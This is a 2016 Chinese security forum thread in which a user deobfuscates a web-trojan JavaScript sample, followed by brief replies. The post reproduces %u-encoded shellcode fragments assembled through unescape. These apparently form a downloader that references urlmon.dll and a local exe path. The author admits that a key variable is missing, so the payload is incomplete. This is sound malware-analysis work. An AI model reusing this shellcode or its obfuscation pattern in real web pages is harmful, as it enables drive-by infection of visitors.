Sp4ce 发表于 2016-8-14 00:06

六年前的遗留(某网马解密实例By是昔流芳)

闲来无事,翻了翻原来的帖子发现芳芳原来有个帖子有个遗留,顺手玩玩吧
一个网马解密实例 by 是昔流芳
http://www.52pojie.cn/thread-32204-1-1.html
(出处: 吾爱破解论坛)
首先呢,遗留内容如下:
dvd="%u";
var bfavp ="sb";
var YuTian,yutianuc,Yutian1,YUtian2,yutian3,yutian4,yutian5,yutian8,ALDWMlz0;
YU tian2=dvd+"642E"+dvd+"6C6C"+dvd+"4400"+dvd+"5C3A"+dvd+"5459"+dvd+"7865"+dvd+"0065"+dvd+"C033"+dvd+"0364"+dvd+"3040"+dvd+"0C78"+dvd+"408B"+dvd+"8B0C"+d vd+"1C70";
YuTian=dvd+"54EB"+dvd+"758B"+dvd+"8B3C"+dvd+"3574"+dvd+"0378"+dvd+"56F5"+dvd+"768B"+dvd+"0320"+dvd+"33F5"+dvd+"49C9"+dvd+"AD41"+dvd+"DB33"+d vd+"0F36"+dvd+"14BE";
yutianuc=dvd+"3828"+dvd+"74F2"+dvd+"C108"+dvd+"0DCB"+d vd+"DA03"+dvd+"EB40"+dvd+"3BEF"+dvd+"75DF"+dvd+"5EE7"+dvd+"5E8B"+dvd+"0324"+dvd+"66DD"+dvd+"0C8B";
yutian3=dvd+"8BAD"+dvd+"0840"+dvd+"09EB"+dvd+"408B"+dvd+"8D34"+dvd+"7C40"+dvd+"408B"+dvd+"953C"+dvd+"8EBF"+dvd+"0E4E"+dvd+"E8EC"+dvd+"FF84"+dvd+"FFFF"+dvd+"EC83"+dvd+"8304"+dvd+"242C"+dvd+"FF3C"+dvd+"95 D0"+dvd+"BF50"+dvd+"1A36"+dvd+"70";
Yutian1=dvd+"8B4B"+dvd+"1C5E"+dvd+"DD03"+dvd+"048B"+dvd+"038B"+dvd+"C3C5"+dvd+"7275"+dvd+"6D6C"+dvd+"6E6F";
yutian4="2F"+dvd+"6FE8"+dvd+"FFFF"+dvd+"8BFF"+dvd+"2454"+dvd+"8DFC"+dvd+"BA52"+dvd+"DB33"+dvd+"5353"+dvd+"EB52"+dvd;
yutian8="BF"+dvd+"E2D8"+dvd+"E873"+dvd+"FF 40"+dvd+"FFFF"+dvd+"FF52"+dvd+"E8D0"+dvd+"FFD7"+dvd+"FFFF";
yutian5="5324"+d vd+"D0FF"+dvd+"BF5D"+dvd+"FE"+"98"+dvd+"0E8A"+dvd+"53E8"+dvd+"FFFF"+dvd+"83FF"+dvd+"04EC"+dvd+"2C83"+dvd+"6224"+dvd+"D0FF"+dvd+"7E";
var shelldown=unescape(YuTian+yutianuc+Yutian1+YUtian2+yutian3+yutian4+yutian5+yutian8);
var shellxia=unescape(ALDWMlz0);
var shellcode=shelldown+shellxia;
整理后得到shelldown的内容是
dvd+"54EB"+dvd+"758B"+dvd+"8B3C"+dvd+"3574"+dvd+"0378"+dvd+"56F5"+dvd+"768B"+dvd+"0320"+dvd+"33F5"+dvd+"49C9"+dvd+"AD41"+dvd+"DB33"+dvd+"0F36"+dvd+"14BE"+dvd+"3828"+dvd+"74F2"+dvd+"C108"+dvd+"0DCB"+d+dvd+"8B4B"+dvd+"1C5E"+dvd+"DD03"+dvd+"048B"+dvd+"038B"+dvd+"C3C5"+dvd+"7275"+dvd+"6D6C"+dvd+"6E6F"+dvd+"642E"+dvd+"6C6C"+dvd+"4400"+dvd+"5C3A"+dvd+"5459"+dvd+"7865"+dvd+"0065"+dvd+"C033"+dvd+"0364"+dvd+"3040"+dvd+"0C78"+dvd+"408B"+dvd+"8B0C"+dvd+"1C70"+dvd+"8BAD"+dvd+"0840"+dvd+"09EB"+dvd+"408B"+dvd+"8D34"+dvd+"7C40"+dvd+"408B"+dvd+"953C"+dvd+"8EBF"+dvd+"0E4E"+dvd+"E8EC"+dvd+"FF84"+dvd+"FFFF"+dvd+"EC83"+dvd+"8304"+dvd+"242C"+dvd+"FF3C"+dvd+"95D0"+dvd+"BF50"+dvd+"1A36"+dvd+"70"+"2F"+dvd+"6FE8"+dvd+"FFFF"+dvd+"8BFF"+dvd+"2454"+dvd+"8DFC"+dvd+"BA52"+dvd+"DB33"+dvd+"5353"+dvd+"EB52"+dvd+"5324"+dvd+"D0FF"+dvd+"BF5D"+dvd+"FE"+"98"+dvd+"0E8A"+dvd+"53E8"+dvd+"FFFF"+dvd+"83FF"+dvd+"04EC"+dvd+"2C83"+dvd+"6224"+dvd+"D0FF"+dvd+"7E"+"BF"+dvd+"E2D8"+dvd+"E873"+dvd+"FF 40"+dvd+"FFFF"+dvd+"FF52"+dvd+"E8D0"+dvd+"FFD7"+dvd+"FFFF"
由于上面dvd赋值为%u,而且Shellcode网马特征:以相同分隔符(一般为%u)分隔的4位一组的十六进制字符串。
所以,我们现在可以把dvd换为%u,得到%u54EB+%u758B+%u8B3C+%u3574+%u0378+%u56F5+%u768B+%u0320+%u33F5+%u49C9+%uAD41+%uDB33+%u0F36+%u14BE+%u3828+%u74F2+%uC108+%u0DCB+d+%u8B4B+%u1C5E+%uDD03+%u048B+%u038B+%uC3C5+%u7275+%u6D6C+%u6E6F+%u642E+%u6C6C+%u4400+%u5C3A+%u5459+%u7865+%u0065+%uC033+%u0364+%u3040+%u0C78+%u408B+%u8B0C+%u1C70+%u8BAD+%u0840+%u09EB+%u408B+%u8D34+%u7C40+%u408B+%u953C+%u8EBF+%u0E4E+%uE8EC+%uFF84+%uFFFF+%uEC83+%u8304+%u242C+%uFF3C+%u95 D0+%uBF50+%u1A36+%u70+2F+%u6FE8+%uFFFF+%u8BFF+%u2454+%u8DFC+%uBA52+%uDB33+%u5353+%uEB52+%u5324+%uD0FF+%uBF5D+%uFE+98+%u0E8A+%u53E8+%uFFFF+%u83FF+%u04EC+%u2C83+%u6224+%uD0FF+%u7E+BF+%uE2D8+%uE873+%uFF40+%uFFFF+%uFF52+%uE8D0+%uFFD7+%uFFFF
再来去除+干扰
%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCBd%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4400%u5C3A%u5459%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95 D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF
然后我们用freshow进行2次ESC解密,得到以下结果

注意那个红框圈的urlmon.dllD:\YTexe3,初步判断为DLL劫持,但是由于代码中的ALDWMlz0值我没找到,所以shellcode无法解出正确的地址,时间也比较久了,希望有机会能接触下这款网马

style123 发表于 2016-8-14 00:10

沙发赶紧来个葛优躺!

Superbai 发表于 2016-8-14 00:46

北京瘫已经准备好

旧信纸 发表于 2016-8-14 01:49

来晚了地板没了。。   

572688542 发表于 2016-8-14 02:06

姿势躺好。。{:17_1062:}

让导弹飞 发表于 2016-8-14 05:08

上来,自己动。

nersle 发表于 2016-8-14 07:24

学习了!

booms 发表于 2016-8-14 07:50

学习虽然看不懂

vm007 发表于 2016-8-14 08:13

学习了,{:1_914:}

xi850202 发表于 2016-8-14 08:19

路过看看,真看不懂,怎么回事
页: [1] 2
查看完整版本: 六年前的遗留(某网马解密实例By是昔流芳)


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52pojie.cn